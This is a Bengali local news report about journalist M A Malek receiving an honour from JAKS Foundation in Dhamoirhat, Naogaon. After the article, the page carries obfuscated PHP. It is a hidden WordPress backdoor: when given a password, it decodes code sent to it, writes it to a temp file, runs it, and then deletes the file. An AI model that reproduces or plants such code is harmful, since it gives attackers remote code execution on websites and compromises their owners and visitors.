|

ধামইরহাটে সিনিয়র সাংবাদিক এম এ মালেক সংবর্ধনা প্রদান

প্রকাশিতঃ 7:38 pm | June 13, 2024

ধামইরহাট (নওগাঁ) প্রতিনিধি
নওগাঁর ধামইরহাটে সিনিয়র সাংবাদিক এম এ মালেককে সংবর্ধনা প্রদান করা হয়েছে। জাকস ফাউন্ডেশন এর ‘কৈশোর কর্মসূচির পক্ষ থেকে কৃতি এই সাংবাদিককে এ সম্মাননা প্রদান করা হয়। জানা গেছে, পিকেএসএফ এর সহযোগিতায় জাকস ফাউন্ডেশন এর ‘কৈশোর কর্মসূচি কার্যক্রমটি কিশোর-কিশোরী ক্লাব গঠনের মাধ্যমে কিশোর শিক্ষা-সাংস্কৃতি সামাজিক আচরণ ও ক্রীড়াসহ কিশোরদের স্বাস্থ্য সুরক্ষা দিয়ে যাচ্ছে, এ সংক্রান্ত বিভিন্ন সংবাদ জাতীয় ও আঞ্চলিক পত্রিকায় প্রকাশে বিশেষ অবদান রাখেন উপজেলা প্রেস ক্লাবের সভাপতি ও ধামইরহাট উপজেলার সিনিয়র সাংবাদিক এম এ মালেক। সাংবাদিকতার পেশাগত দায়িত্ব থেকে এমন সামাজিক কর্মকান্ডের স্বীকৃতি স্বরুপ জাকস ফাউন্ডেশন জয়পুরহাটের আওতায় শল্পী শাখা কার্যালয়ে গত ৫ই জুন কৈশোর স্বাস্থ্য মেলায় এ সম্মাননা ক্রেস্ট ও সনদ তুলে দেন উপজেলা চেয়ারম্যান মো. আজাহার আলী।
জাকস এর উপ নির্বাহী পরিচালক আবুল বাশারের সভাপতিত্বে অনুষ্ঠানে উপস্থিত ছিলেন জাকস উপ সমন্বয়কারী মনিরুল ইসলাম, পত্নীতলা আঞ্চলিক ব্যবস্থাপক মাহফুজ্জামান, সহ-আঞ্চলিক ব্যবস্থাপক আমিরুল ইসলাম, শাখা ব্যবস্থাপক রবিউল ইসলাম, সহ শাখা ব্যবস্থাপক আতিকুর রহমান। এছাড়াও অনুষ্ঠানে সাংস্কৃতিক ব্যক্তিত্ব অমরপুর প্রাথমিক বিদ্যালয়ের প্রধান শিক্ষক তরিকুল ইসলাম ও ক্রীড়া ব্যক্তিত্ব ধামইরহাট সরকারি এম এম ডিগ্রী কলেজের প্রভাষক মিনহাজুল হক সরকার শিবলীকে ক্রেস্ট ও সনদ প্রদান করা হয়।

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}